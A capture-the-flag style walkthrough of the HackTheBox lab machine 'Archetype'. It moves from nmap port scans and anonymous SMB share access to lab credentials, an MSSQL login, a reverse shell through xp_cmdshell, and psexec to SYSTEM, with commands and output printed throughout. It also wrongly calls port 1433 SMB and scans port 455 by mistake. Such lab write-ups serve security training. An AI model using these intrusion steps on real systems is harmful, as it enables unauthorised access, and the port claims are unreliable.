They will provide official walkthroughs for each 9 machines. As I think it will be very helpfull for noob to understand the platform, techniques and more about HTB. And when it comes to noob, no one is here to find just zero-day vulnerabilities. So from my perspective, it's fine to read each and every walkthroughs provided by HTB and others to understand by yourself. "Walkthroughs are the teachers".
Enough talks 🥱, let's start to hack. 🐱💻
Disclaimers: No flags (user/root) are shown in this writeup (as usual in writeups), so follow the procedures to grab the flags! 🐱👤
00. Start Machine …
To start machine, Just click "Join Machine".
Then you can see the IP address for that machine. usually it is 10.10.10.27 🤠
Before going to enumeration steps we can simply ping to the IP address and check our VPN connection and whether machine is alive. Sometimes machines might "Disable" ping requests from passing through the firewall. But in most case ping will be a success!
root in ~/Documents/HackThebox/Archetype
⚡❯ ping 10.10.10.27 -c 2
PING 10.10.10.27 (10.10.10.27) 56(84) bytes of data.
64 bytes from 10.10.10.27: icmp_seq=1 ttl=127 time=252 ms
64 bytes from 10.10.10.27: icmp_seq=2 ttl=127 time=251 ms
--- 10.10.10.27 ping statistics ---
2 packets transmitted, 2 received, 0% packet loss, time 1002ms
rtt min/avg/max/mdev = 250.934/251.550/252.167/0.616 ms
-n : Never do DNS resolution
-vv : Extra verbosity
--open : Output only open ports
-p- : Full TCP ports range (65535)
-T4 : Aggressive (4) speeds scans; assumes you are on a reasonably fast and reliable network
Here is the output 👇
root in ~/Documents/HackThebox/Archetype 🐍 v3.9.2
⚡❯ nmap -n -vv --open -T4 -p- -oN AllPorts.nmap 10.10.10.27
Starting Nmap 7.91 ( https://nmap.org ) at 2021-04-15 19:15 +0530
Initiating Ping Scan at 19:15
Scanning 10.10.10.27 [4 ports]
Completed Ping Scan at 19:15, 0.27s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 19:15
Scanning 10.10.10.27 [65535 ports]
Discovered open port 139/tcp on 10.10.10.27
Discovered open port 445/tcp on 10.10.10.27
Discovered open port 135/tcp on 10.10.10.27
Discovered open port 49669/tcp on 10.10.10.27
SYN Stealth Scan Timing: About 7.87% done; ETC: 19:21 (0:06:03 remaining)
SYN Stealth Scan Timing: About 8.21% done; ETC: 19:27 (0:11:22 remaining)
Discovered open port 5985/tcp on 10.10.10.27
SYN Stealth Scan Timing: About 42.06% done; ETC: 19:18 (0:02:05 remaining)
Discovered open port 47001/tcp on 10.10.10.27
Discovered open port 49666/tcp on 10.10.10.27
SYN Stealth Scan Timing: About 64.67% done; ETC: 19:18 (0:01:06 remaining)
Discovered open port 49667/tcp on 10.10.10.27
Discovered open port 1433/tcp on 10.10.10.27
Discovered open port 49665/tcp on 10.10.10.27
Discovered open port 49664/tcp on 10.10.10.27
Discovered open port 49668/tcp on 10.10.10.27
Completed SYN Stealth Scan at 19:17, 172.44s elapsed (65535 total ports)
Nmap scan report for 10.10.10.27
Host is up, received echo-reply ttl 127 (0.67s latency).
Scanned at 2021-04-15 19:15:06 +0530 for 173s
Not shown: 65523 closed ports
Reason: 65523 resets
PORT STATE SERVICE REASON
135/tcp open msrpc syn-ack ttl 127
139/tcp open netbios-ssn syn-ack ttl 127
445/tcp open microsoft-ds syn-ack ttl 127
1433/tcp open ms-sql-s syn-ack ttl 127
5985/tcp open wsman syn-ack ttl 127
47001/tcp open winrm syn-ack ttl 127
49664/tcp open unknown syn-ack ttl 127
49665/tcp open unknown syn-ack ttl 127
49666/tcp open unknown syn-ack ttl 127
49667/tcp open unknown syn-ack ttl 127
49668/tcp open unknown syn-ack ttl 127
49669/tcp open unknown syn-ack ttl 127
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 172.86 seconds
Raw packets sent: 102404 (4.506MB) | Rcvd: 93270 (3.731MB)
I have some tricky bash script to get all open ports as bash variable call "ports". Somehow it will be helpful later. 😎
Yes, we can simply combine those two lines into one. But I need to see results quickly. That's why I divide it into two parts. If you want it in one line, you can use
root in ~/Documents/HackThebox/Archetype 🐍 v3.9.2 took 2m52s
⚡❯ more AllPorts.nmap
# Nmap 7.91 scan initiated Thu Apr 15 19:15:06 2021 as: nmap -n -vv --open -T4 -p- -oN AllPorts.nmap 10.10.10.27
Nmap scan report for 10.10.10.27
Host is up, received echo-reply ttl 127 (0.67s latency).
Scanned at 2021-04-15 19:15:06 +0530 for 173s
Not shown: 65523 closed ports
Reason: 65523 resets
PORT STATE SERVICE REASON
135/tcp open msrpc syn-ack ttl 127 * (Interesting)
139/tcp open netbios-ssn syn-ack ttl 127 * (Interesting)
445/tcp open microsoft-ds syn-ack ttl 127 * (Interesting)
1433/tcp open ms-sql-s syn-ack ttl 127 * (Interesting)
5985/tcp open wsman syn-ack ttl 127 * (Interesting)
47001/tcp open winrm syn-ack ttl 127 * (Interesting)
49664/tcp open unknown syn-ack ttl 127
49665/tcp open unknown syn-ack ttl 127
49666/tcp open unknown syn-ack ttl 127
49667/tcp open unknown syn-ack ttl 127
49668/tcp open unknown syn-ack ttl 127
49669/tcp open unknown syn-ack ttl 127
Here we can see some * (Interesting) ports. others can be avoid.
01.2 Run Nmap Scripting Engine
To get the best result we can run the Nmap Scripting Engine for all open ports. Now we know all open ports so that we can point out and run the script engine as fast as possible.
Most of the case this will be end up an error because of $ports variable. This is not the right time to fix it so if you get any error, run the command without $ports variable and point out all ports.
root in ~/Documents/HackThebox/Archetype 🐍 v3.9.2
⚡❯ nmap -sV -sC -oN DetailPorts.nmap -p 135,139,455,1433 10.10.10.27
Starting Nmap 7.91 ( https://nmap.org ) at 2021-04-15 19:38 +0530
Nmap scan report for 10.10.10.27
Host is up (0.52s latency).
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
455/tcp closed creativepartnr
1433/tcp open ms-sql-s Microsoft SQL Server 2017 14.00.1000.00; RTM
| ms-sql-ntlm-info:
| Target_Name: ARCHETYPE
| NetBIOS_Domain_Name: ARCHETYPE
| NetBIOS_Computer_Name: ARCHETYPE
| DNS_Domain_Name: Archetype
| DNS_Computer_Name: Archetype
|_ Product_Version: 10.0.17763
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2021-04-15T14:30:06
|_Not valid after: 2051-04-15T14:30:06
|_ssl-date: 2021-04-15T14:30:34+00:00; +21m39s from scanner time.
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 21m39s, deviation: 0s, median: 21m38s
| ms-sql-info:
| 10.10.10.27:1433:
| Version:
| name: Microsoft SQL Server 2017 RTM
| number: 14.00.1000.00
| Product: Microsoft SQL Server 2017
| Service pack level: RTM
| Post-SP patches applied: false
|_ TCP port: 1433
|_smb2-security-mode: SMB: Couldn't find a NetBIOS name that works for the server. Sorry!
|_smb2-time: ERROR: Script execution failed (use -d to debug)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 29.24 seconds
Now we know the OS is Windows (Microsoft SQL Server 2017 RTM) and it has SMB (1433) port open. And lets enumerate further. Remember enumerating is the key! 🔑
01.3 List all available shares
So here it has smb (1433) port open. I used smbclient to list out all the available shares as anonymous user.
sudo smbclient -N -L 10.10.10.27
-N : Don't ask for a password
-L : Get a list of shares available on a host
Here is output 👇
root in ~/Documents/HackThebox/Archetype 🐍 v3.9.2
⚡❯ sudo smbclient -N -L 10.10.10.27
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
backups Disk
C$ Disk Default share
IPC$ IPC Remote IPC
SMB1 disabled -- no workgroup available
Here we got something very interesting right? There is only single share ‘backups’ accessible with no passwords. so let's try to access it and see what's inside.😎😋
smbclient -N \\\\10.10.10.27\\backups\\
So now we are done with SMB shell and there is a file called ‘prod.dtsConfig'. so let's download it.
root in ~/Documents/HackThebox/Archetype 🐍 v3.9.2
⚡❯ smbclient -N \\\\10.10.10.27\\backups\\
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Mon Jan 20 17:50:57 2020
.. D 0 Mon Jan 20 17:50:57 2020
prod.dtsConfig AR 609 Mon Jan 20 17:53:02 2020
10328063 blocks of size 4096. 8203982 blocks available
smb: \> get prod.dtsConfig
getting file \prod.dtsConfig of size 609 as prod.dtsConfig (0.2 KiloBytes/sec) (average 0.2 KiloBytes/sec)
smb: \>
smb: \> dir : List all directories
smb: \> get <file-name> : Download file
Now we can open prod.dtsConfig file and yeah that ‘prod.dtsConfig’ file contains a SQL connection string, containing credentials for the local Windows user ARCHETYPE\sql_svc 🥂.
Now we have credentials, Let's try connecting to the SQL Server using Impacket's mssqlclient.py
Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself. Packets can be constructed from scratch, as well as parsed from raw data, and the object oriented API makes it simple to work with deep hierarchies of protocols. The library provides a set of tools as examples of what can be done within the context of this library.
Now we can use the IS_SRVROLEMEMBER function to check whether the current SQL user has sysadmin (highest level) privileges on the SQL Server.
root in ~/Documents/HackThebox/Archetype 🐍 v3.9.2
⚡❯ python3 mssqlclient.py ARCHETYPE/sql_svc:M3g4c0rp123@10.10.10.27 -windows-auth
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(ARCHETYPE): Line 1: Changed database context to 'master'.
[*] INFO(ARCHETYPE): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (140 3232)
[!] Press help for extra shell commands
SQL> SELECT IS_SRVROLEMEMBER ('sysadmin')
-----------
1
SQL>
According to the return value (1 = login is a member of role.) yes we have highest privileges.😁 This will allow us to enable xp_cmdshell and gain RCE on the host.
Check below awesome blog posts to understand that trick.
Now time to get reverse shell. Save above powershell script as anyname.ps1 (here I use script.ps1) and power up mini webserver. I'm a very lasy man you know 🙄 so here I use updog instead of typing long shit in python 😑
Updog is a replacement for Python's SimpleHTTPServer. It allows uploading and downloading via HTTP/S, can set ad hoc SSL certificates and use HTTP basic auth.
root in ~/Documents/HackThebox/Archetype 🐍 v3.9.2
⚡❯ updog
[+] Serving /root/Documents/HackThebox/Archetype...
* Running on http://0.0.0.0:9090/ (Press CTRL+C to quit)
To listen the connection, I always use the swiss army knife (netcat) tool. personally I do not like to get shell through multi handler (metasploit). Trust me, using netcat tool you can learn a lot of things beyond metaspolit. 👽
root in ~/Documents/HackThebox/Archetype 🐍 v3.9.2
⚡❯ nc -lvnp 4444
listening on [any] 4444 ...
03. Exploit the target …
Now we can issue the command to download and execute the reverse shell through xp_cmdshell.
I divided up my terminal up to 3 parts using Tmux multiplexer.
Woooh!!! We got our shell. 💀 A shell is received as sql_svc, and we can get the user.txt on their desktop.
04. Privilege Escalation …
To escalate privileges we can run different tools. By the way, before run any tool there are some steps that you need to run to enumerate some information. I will be showing you one by one in each walkthroughs.
Did you remember? now we are in service account called sql_svc. It's good practice to check recently accessed files/executed commands (Keep in mind as good practice). Mostly (default) our console history will be saved in C:\Users\<account_name>\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt . Now you understand what our next step is.
Right, Let's check above file using type command.
type C:\Users\sql_svc\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
Here is the output 👇
PS C:\Users\Administrator> type C:\Users\sql_svc\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
net.exe use T: \\Archetype\backups /user:administrator MEGACORP_4dm1n!!
exit
PS C:\Users\Administrator>
Oh no no no noooo.. You see?
The backup share is mapped with admin credentials. Remember if you saw something like this. ready to launch Impacket's psexec.py script.
root in ~/Documents/HackThebox/Archetype 🐍 v3.9.2
⚡❯ python3 /usr/share/doc/python3-impacket/examples/psexec.py administrator:MEGACORP_4dm1n\!\!@10.10.10.27
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation
[*] Requesting shares on 10.10.10.27.....
[*] Found writable share ADMIN$
[*] Uploading file gZiCFMKg.exe
[*] Opening SVCManager on 10.10.10.27.....
[*] Creating service FuWR on 10.10.10.27.....
[*] Starting service FuWR.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.107]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
nt authority\system
C:\Windows\system32>
Finally we have Administrator Privileges. 👌 Now we can access the flag on the administrator desktop.
